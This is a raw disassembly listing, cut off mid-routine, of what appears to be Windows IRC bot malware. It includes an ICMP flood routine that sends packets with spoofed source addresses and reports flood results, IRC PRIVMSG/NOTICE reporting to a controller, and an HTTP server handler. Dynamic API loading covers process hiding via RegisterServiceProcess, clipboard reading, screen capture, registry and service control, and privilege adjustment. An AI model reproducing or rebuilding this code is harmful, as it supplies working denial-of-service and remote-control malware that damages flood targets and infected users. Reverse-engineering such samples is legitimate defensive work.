loc_403FF1: ; CODE XREF: sub_403E06+198�j
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_340]
rep stosd
lea eax, [ebp+var_28F0]
xor ebx, ebx
xor esi, esi
lea ecx, [eax+1]
loc_40400B: ; CODE XREF: sub_403E06+20A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40400B
sub eax, ecx
mov [ebp+var_C], eax
jz loc_404195
loc_40401D: ; CODE XREF: sub_403E06+2D0�j
mov al, [ebp+ebx+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_4040C0
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40409A
lea eax, [ebp+var_18F0]
lea edx, [eax+1]
loc_404054: ; CODE XREF: sub_403E06+253�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404054
sub eax, edx
cmp eax, 5
jbe short loc_40409A
mov eax, offset asc_41FA74 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_413920
pop ecx
pop ecx
push eax
call sub_413920
pop ecx
pop ecx
push eax
call sub_413859
pop ecx
pop ecx
lea edx, [ebp+var_340]
loc_40408E: ; CODE XREF: sub_403E06+290�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40408E
jmp short loc_4040AE
; ---------------------------------------------------------------------------
loc_40409A: ; CODE XREF: sub_403E06+243�j
; sub_403E06+25A�j
push 3
mov edi, offset asc_420620 ; "\r\n"
lea esi, [ebp+var_18F0]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_4040E1
loc_4040AE: ; CODE XREF: sub_403E06+292�j
xor eax, eax
mov ecx, 400h
lea edi, [ebp+var_18F0]
rep stosd
or esi, 0FFFFFFFFh
loc_4040C0: ; CODE XREF: sub_403E06+227�j
lea eax, [ebp+var_28F0]
inc ebx
inc esi
lea ecx, [eax+1]
loc_4040CB: ; CODE XREF: sub_403E06+2CA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4040CB
sub eax, ecx
cmp ebx, eax
jb loc_40401D
jmp loc_404195
; ---------------------------------------------------------------------------
loc_4040E1: ; CODE XREF: sub_403E06+2A6�j
mov ecx, [ebp+var_128]
xor eax, eax
test ecx, ecx
jbe short loc_404120
loc_4040ED: ; CODE XREF: sub_403E06+2F6�j
mov edx, [ebp+eax*4+var_124]
cmp edx, [ebp+arg_0]
jz short loc_404115
inc eax
cmp eax, ecx
jb short loc_4040ED
jmp short loc_404120
; ---------------------------------------------------------------------------
loc_404100: ; CODE XREF: sub_403E06+312�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ecx, [ebp+var_128]
inc eax
loc_404115: ; CODE XREF: sub_403E06+2F1�j
dec ecx
cmp eax, ecx
jb short loc_404100
dec [ebp+var_128]
loc_404120: ; CODE XREF: sub_403E06+2E5�j
; sub_403E06+2F8�j
lea eax, [ebp+var_340]
lea edx, [eax+1]
loc_404129: ; CODE XREF: sub_403E06+328�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404129
sub eax, edx
mov esi, eax
lea eax, [ebp+var_464]
lea ecx, [eax+1]
loc_40413D: ; CODE XREF: sub_403E06+33C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40413D
sub eax, ecx
add eax, esi
cmp eax, 104h
jnb short loc_40418C
and [ebp+var_C], 0
lea eax, [ebp+var_C]
push eax
push 8004667Eh
push [ebp+arg_0]
call dword_433444
push [ebp+var_358]
lea eax, [ebp+var_340]
push [ebp+var_34C]
push eax
lea eax, [ebp+var_464]
push eax
push [ebp+arg_0]
call sub_403B4C
add esp, 14h
jmp short loc_404195
; ---------------------------------------------------------------------------
loc_40418C: ; CODE XREF: sub_403E06+347�j
push [ebp+arg_0]
call dword_4335AC
loc_404195: ; CODE XREF: sub_403E06+211�j
; sub_403E06+2D6�j ...
mov ebx, [ebp+var_8]
loc_404198: ; CODE XREF: sub_403E06+FA�j
; sub_403E06+120�j ...
mov esi, [ebp+arg_0]
inc esi
cmp esi, [ebp+var_4]
mov [ebp+arg_0], esi
jbe loc_403EF0
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov eax, [ebp+var_4]
inc eax
loc_4041BB: ; CODE XREF: sub_403E06+E0�j
lea esi, [ebp+var_128]
lea edi, [ebp+var_23C]
push eax
rep movsd
call dword_433544
cmp eax, 0FFFFFFFFh
jnz loc_403EEB
loc_4041D9: ; CODE XREF: sub_403E06+66�j
; sub_403E06+8D�j ...
call dword_433558
push eax
lea eax, [ebp+var_8F0]
push offset aHttpdErrorServ ; "[HTTPD]: Error: server failed, returned"...
push eax
call sub_412BB5
xor esi, esi
add esp, 0Ch
cmp [ebp+var_350], esi
jnz short loc_404221
push esi
push [ebp+var_354]
lea eax, [ebp+var_8F0]
push eax
lea eax, [ebp+var_6EC]
push eax
push [ebp+var_6F0]
call sub_4045DD
add esp, 14h
loc_404221: ; CODE XREF: sub_403E06+3F6�j
lea eax, [ebp+var_8F0]
push eax
call sub_401C33
pop ecx
push ebx
call dword_4335AC
push [ebp+var_358]
call sub_4111AE
pop ecx
push esi
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_403E06 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_404249 proc near ; DATA XREF: sub_4078FA+2A62�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
pop ecx
mov esi, eax
lea edi, [ebp+var_1BC]
rep movsd
push 0FFh
xor esi, esi
push 3
inc esi
push 2
mov [eax+19Ch], esi
call dword_4334A0
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4042B0
call dword_433558
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSocke ; "[ICMP]: Error: socket() failed, returne"...
push eax
call sub_412BB5
add esp, 0Ch
xor esi, esi
loc_4042A2: ; CODE XREF: sub_404249+9C�j
; sub_404249+C3�j
cmp [ebp+var_24], esi
jnz loc_404504
jmp loc_4044E4
; ---------------------------------------------------------------------------
loc_4042B0: ; CODE XREF: sub_404249+3A�j
push 4
lea ecx, [ebp+var_C]
push ecx
mov [ebp+var_C], esi
push 2
xor esi, esi
push esi
push eax
call dword_4334BC
cmp eax, 0FFFFFFFFh
jnz short loc_4042E7
call dword_433558
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSetso ; "[ICMP]: Error: setsockopt() failed, ret"...
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_4042A2
; ---------------------------------------------------------------------------
loc_4042E7: ; CODE XREF: sub_404249+7F�j
lea eax, [ebp+var_1B8]
push eax
call dword_433514
cmp eax, 0FFFFFFFFh
jnz short loc_40430E
lea eax, [ebp+var_3BC]
push offset aIcmpInvalidTar ; "[ICMP]: Invalid target IP."
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_4042A2
; ---------------------------------------------------------------------------
loc_40430E: ; CODE XREF: sub_404249+AE�j
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
stosd
stosd
push esi
mov [ebp+var_1C], 2
call dword_4335EC
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_433514
mov ebx, ds:dword_41F004
mov [ebp+var_18], eax
mov [ebp+arg_0], esi
call ebx ; GetTickCount
mov [ebp+var_8], eax
call ebx ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_40449C
mov esi, 100h
loc_404362: ; CODE XREF: sub_404249+24B�j
push 41Ch
mov byte_432FF8, 45h
call dword_4335EC
mov word_432FFA, ax
xor eax, eax
cmp [ebp+var_2C], eax
mov word_432FFC, 1
mov word_432FFE, ax
mov byte_433000, 80h
mov byte_433001, 1
mov word_433002, ax
jz short loc_4043D1
call sub_412D71
mov edi, eax
shl edi, 8
call sub_412D71
add edi, eax
shl edi, 8
call sub_412D71
add edi, eax
shl edi, 8
call sub_412D71
add edi, eax
mov dword_433004, edi
jmp short loc_4043E9
; ---------------------------------------------------------------------------
loc_4043D1: ; CODE XREF: sub_404249+159�j
push [ebp+var_1BC]
call sub_406C33
pop ecx
push eax
call dword_433514
mov dword_433004, eax
loc_4043E9: ; CODE XREF: sub_404249+186�j
mov eax, [ebp+var_18]
mov dword_433008, eax
call sub_412D71
cdq
mov ecx, esi
idiv ecx
mov byte_43300C, dl
call sub_412D71
cdq
mov ecx, esi
idiv ecx
mov byte_43300D, dl
call sub_412D71
cdq
mov ecx, 0F0h
idiv ecx
and word_43300E, 0
mov word_433012, 1
inc edx
mov word_433010, dx
call sub_412D71
cdq
mov ecx, 0FFh
idiv ecx
push 10h
mov edi, offset dword_433014
mov al, dl
mov cl, al
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, esi
rep stosd
lea eax, [ebp+var_1C]
push eax
xor edi, edi
push edi
push 41Ch
push offset byte_432FF8
push [ebp+var_4]
call dword_433470
cmp eax, 0FFFFFFFFh
jz loc_404521
inc [ebp+arg_0]
call ebx ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
jbe loc_404362
xor esi, esi
loc_40449C: ; CODE XREF: sub_404249+10E�j
push [ebp+var_4]
call dword_4335AC
mov eax, [ebp+arg_0]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpDoneWithSF ; "[ICMP]: Done with %s flood to IP: %s. S"...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ebp+var_24], esi
jnz short loc_404504
loc_4044E4: ; CODE XREF: sub_404249+62�j
push esi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_4045DD
add esp, 14h
loc_404504: ; CODE XREF: sub_404249+5C�j
; sub_404249+299�j
lea eax, [ebp+var_3BC]
push eax
call sub_401C33
push [ebp+var_38]
call sub_4111AE
pop ecx
pop ecx
push esi
loc_40451B: ; CODE XREF: sub_404249+347�j
call ds:dword_41F014 ; ExitThread
loc_404521: ; CODE XREF: sub_404249+231�j
push [ebp+var_4]
call dword_4335AC
call dword_433558
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
push offset aIcmpErrorSendi ; "[ICMP]: Error sending packets to IP: %s"...
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_412E0D
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_404579
push edi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_4045DD
add esp, 14h
loc_404579: ; CODE XREF: sub_404249+30E�j
lea eax, [ebp+var_3BC]
push eax
call sub_401C33
push [ebp+var_38]
call sub_4111AE
pop ecx
pop ecx
push edi
jmp short loc_40451B
sub_404249 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404592 proc near ; CODE XREF: sub_40751F+40�p
; sub_4078FA+1BB�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push 200h
push eax
call sub_412E64
lea eax, [ebp+var_200]
add esp, 10h
lea edx, [eax+1]
loc_4045BF: ; CODE XREF: sub_404592+32�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4045BF
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_433534
leave
retn
sub_404592 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045DD proc near ; CODE XREF: sub_401000+B2�p
; sub_4010CA+61�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_4045F8
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_4045F8: ; CODE XREF: sub_4045DD+14�j
mov eax, edi
lea edx, [eax+1]
loc_4045FD: ; CODE XREF: sub_4045DD+25�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4045FD
sub eax, edx
mov esi, eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_40460E: ; CODE XREF: sub_4045DD+36�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40460E
push [ebp+arg_8]
sub eax, ecx
mov ecx, 1FAh
sub ecx, eax
push offset aS_1 ; "%s"
sub ecx, esi
push ecx
lea eax, [ebp+var_400]
push eax
call sub_412E0D
lea eax, [ebp+var_400]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push edi
push offset aSSS ; "%s %s :%s\r\n"
push eax
call sub_412BB5
add esp, 24h
lea eax, [ebp+var_200]
pop edi
lea ecx, [eax+1]
pop esi
loc_40465F: ; CODE XREF: sub_4045DD+87�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40465F
push 0
sub eax, ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_433534
cmp [ebp+arg_10], 0
jz short locret_40468C
push 0FAh
call ds:dword_41F000 ; Sleep
locret_40468C: ; CODE XREF: sub_4045DD+A2�j
leave
retn
sub_4045DD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40468E proc near ; CODE XREF: sub_40D1EF+4B�p
push ebx
push ebp
mov ebp, ds:dword_41F078
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, ds:dword_41F074
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4047AE
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_433478, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_433490, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_4334EC, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_433450, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_4334B8, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_43349C, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_43353C, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_43342C, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_4334C0, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_4334E4, eax
call esi ; GetProcAddress
cmp dword_433478, ebx
mov dword_433548, eax
jz short loc_40478C
cmp dword_433490, ebx
jz short loc_40478C
cmp dword_4334EC, ebx
jz short loc_40478C
cmp dword_433450, ebx
jz short loc_40478C
cmp dword_43349C, ebx
jz short loc_40478C
cmp dword_43353C, ebx
jz short loc_40478C
cmp dword_43342C, ebx
jz short loc_40478C
cmp dword_4334C0, ebx
jz short loc_40478C
cmp dword_4334E4, ebx
jz short loc_40478C
cmp eax, ebx
jnz short loc_404796
loc_40478C: ; CODE XREF: sub_40468E+B8�j
; sub_40468E+C0�j ...
mov dword_4335F0, 1
loc_404796: ; CODE XREF: sub_40468E+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_43359C, eax
jz short loc_4047C3
push 1
push ebx
call eax
jmp short loc_4047C3
; ---------------------------------------------------------------------------
loc_4047AE: ; CODE XREF: sub_40468E+1D�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_4335F4, eax
mov dword_4335F0, 1
loc_4047C3: ; CODE XREF: sub_40468E+117�j
; sub_40468E+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_41F070 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40487E
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_433560, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_4334F8, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_433434, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_433498, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_43344C, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_4335CC, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_433430, eax
call esi ; GetProcAddress
cmp dword_433560, ebx
mov dword_433538, eax
jz short loc_404889
cmp dword_4334F8, ebx
jz short loc_404889
cmp dword_433434, ebx
jz short loc_404889
cmp dword_433498, ebx
jz short loc_404889
cmp dword_43344C, ebx
jz short loc_404889
cmp dword_4335CC, ebx
jz short loc_404889
cmp dword_433430, ebx
jz short loc_404889
cmp eax, ebx
jnz short loc_404893
jmp short loc_404889
; ---------------------------------------------------------------------------
loc_40487E: ; CODE XREF: sub_40468E+144�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_4335FC, eax
loc_404889: ; CODE XREF: sub_40468E+1B8�j
; sub_40468E+1C0�j ...
mov dword_4335F8, 1
loc_404893: ; CODE XREF: sub_40468E+1EC�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_404A2E
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_4335C8, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_4334E8, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_433484, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_433460, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_4334DC, eax
call esi ; GetProcAddress
cmp dword_4335C8, ebx
mov dword_43357C, eax
jz short loc_40491E
cmp dword_4334E8, ebx
jz short loc_40491E
cmp dword_433484, ebx
jz short loc_40491E
cmp dword_433460, ebx
jz short loc_40491E
cmp dword_4334DC, ebx
jz short loc_40491E
cmp eax, ebx
jnz short loc_404928
loc_40491E: ; CODE XREF: sub_40468E+26A�j
; sub_40468E+272�j ...
mov dword_433600, 1
loc_404928: ; CODE XREF: sub_40468E+28E�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_4335D4, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_4335BC, eax
call esi ; GetProcAddress
cmp dword_4335D4, ebx
mov dword_433508, eax
jz short loc_404963
cmp dword_4335BC, ebx
jz short loc_404963
cmp eax, ebx
jnz short loc_40496D
loc_404963: ; CODE XREF: sub_40468E+2C7�j
; sub_40468E+2CF�j
mov dword_433600, 1
loc_40496D: ; CODE XREF: sub_40468E+2D3�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_43355C, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_4335D8, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_433564, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_433580, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_433494, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_4334D0, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_43356C, eax
call esi ; GetProcAddress
cmp dword_43355C, ebx
mov dword_433598, eax
jz short loc_404A11
cmp dword_4335D8, ebx
jz short loc_404A11
cmp dword_433564, ebx
jz short loc_404A11
cmp dword_433580, ebx
jz short loc_404A11
cmp dword_433494, ebx
jz short loc_404A11
cmp dword_4334D0, ebx
jz short loc_404A11
cmp dword_43356C, ebx
jz short loc_404A11
cmp eax, ebx
jnz short loc_404A1B
loc_404A11: ; CODE XREF: sub_40468E+34D�j
; sub_40468E+355�j ...
mov dword_433600, 1
loc_404A1B: ; CODE XREF: sub_40468E+381�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_433530, eax
jnz short loc_404A43
jmp short loc_404A39
; ---------------------------------------------------------------------------
loc_404A2E: ; CODE XREF: sub_40468E+210�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433604, eax
loc_404A39: ; CODE XREF: sub_40468E+39E�j
mov dword_433600, 1
loc_404A43: ; CODE XREF: sub_40468E+39C�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_404B0F
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_4335DC, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_4335B0, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_433518, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_433510, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_433554, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_43343C, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_433528, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_4334CC, eax
call esi ; GetProcAddress
cmp dword_4335DC, ebx
mov dword_43351C, eax
jz short loc_404B1A
cmp dword_4335B0, ebx
jz short loc_404B1A
cmp dword_433518, ebx
jz short loc_404B1A
cmp dword_433510, ebx
jz short loc_404B1A
cmp dword_433554, ebx
jz short loc_404B1A
cmp dword_43343C, ebx
jz short loc_404B1A
cmp dword_433528, ebx
jz short loc_404B1A
cmp dword_4334CC, ebx
jz short loc_404B1A
cmp eax, ebx
jnz short loc_404B24
jmp short loc_404B1A
; ---------------------------------------------------------------------------
loc_404B0F: ; CODE XREF: sub_40468E+3C0�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_43360C, eax
loc_404B1A: ; CODE XREF: sub_40468E+441�j
; sub_40468E+449�j ...
mov dword_433608, 1
loc_404B24: ; CODE XREF: sub_40468E+47D�j
mov ebp, ds:dword_41F070
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_404DE0
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_4334B0, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_433424, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_43352C, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_4334F4, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_433574, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_433558, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_4335B8, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_4334A0, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_433444, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_433458, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_433520, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_433514, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_4335EC, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_4335C4, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_433594, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov dword_433570, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_433534, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_433470, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_433414, eax
call esi ; GetProcAddress
mov dword_433438, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_433578, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_433544, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_4335C0, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_433464, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_4334BC, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_433418, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_4335B4, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_433500, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_433590, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_4334E0, eax
call esi ; GetProcAddress
cmp dword_4334B0, ebx
mov dword_4335AC, eax
jz loc_404DEB
cmp dword_433424, ebx
jz loc_404DEB
cmp dword_43352C, ebx
jz loc_404DEB
cmp dword_433574, ebx
jz loc_404DEB
cmp dword_433558, ebx
jz loc_404DEB
cmp dword_4335B8, ebx
jz loc_404DEB
cmp dword_4334A0, ebx
jz loc_404DEB
cmp dword_433444, ebx
jz loc_404DEB
cmp dword_433458, ebx
jz loc_404DEB
cmp dword_433520, ebx
jz loc_404DEB
cmp dword_433514, ebx
jz loc_404DEB
cmp dword_4335EC, ebx
jz loc_404DEB
cmp dword_4335C4, ebx
jz loc_404DEB
cmp dword_433594, ebx
jz short loc_404DEB
cmp dword_433534, ebx
jz short loc_404DEB
cmp dword_433470, ebx
jz short loc_404DEB
cmp dword_433414, ebx
jz short loc_404DEB
cmp dword_433438, ebx
jz short loc_404DEB
cmp dword_433578, ebx
jz short loc_404DEB
cmp dword_433544, ebx
jz short loc_404DEB
cmp dword_4335C0, ebx
jz short loc_404DEB
cmp dword_433464, ebx
jz short loc_404DEB
cmp dword_4334BC, ebx
jz short loc_404DEB
cmp dword_433418, ebx
jz short loc_404DEB
cmp dword_4335B4, ebx
jz short loc_404DEB
cmp dword_433500, ebx
jz short loc_404DEB
cmp dword_433590, ebx
jz short loc_404DEB
cmp eax, ebx
jnz short loc_404DF5
jmp short loc_404DEB
; ---------------------------------------------------------------------------
loc_404DE0: ; CODE XREF: sub_40468E+4A7�j
call ds:dword_41F008 ; RtlGetLastWin32Error
mov dword_433614, eax
loc_404DEB: ; CODE XREF: sub_40468E+646�j
; sub_40468E+652�j ...
mov dword_433610, 1
loc_404DF5: ; CODE XREF: sub_40468E+74E�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_404EFA
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_433428, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_4335E8, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_4334C8, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_4335E4, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
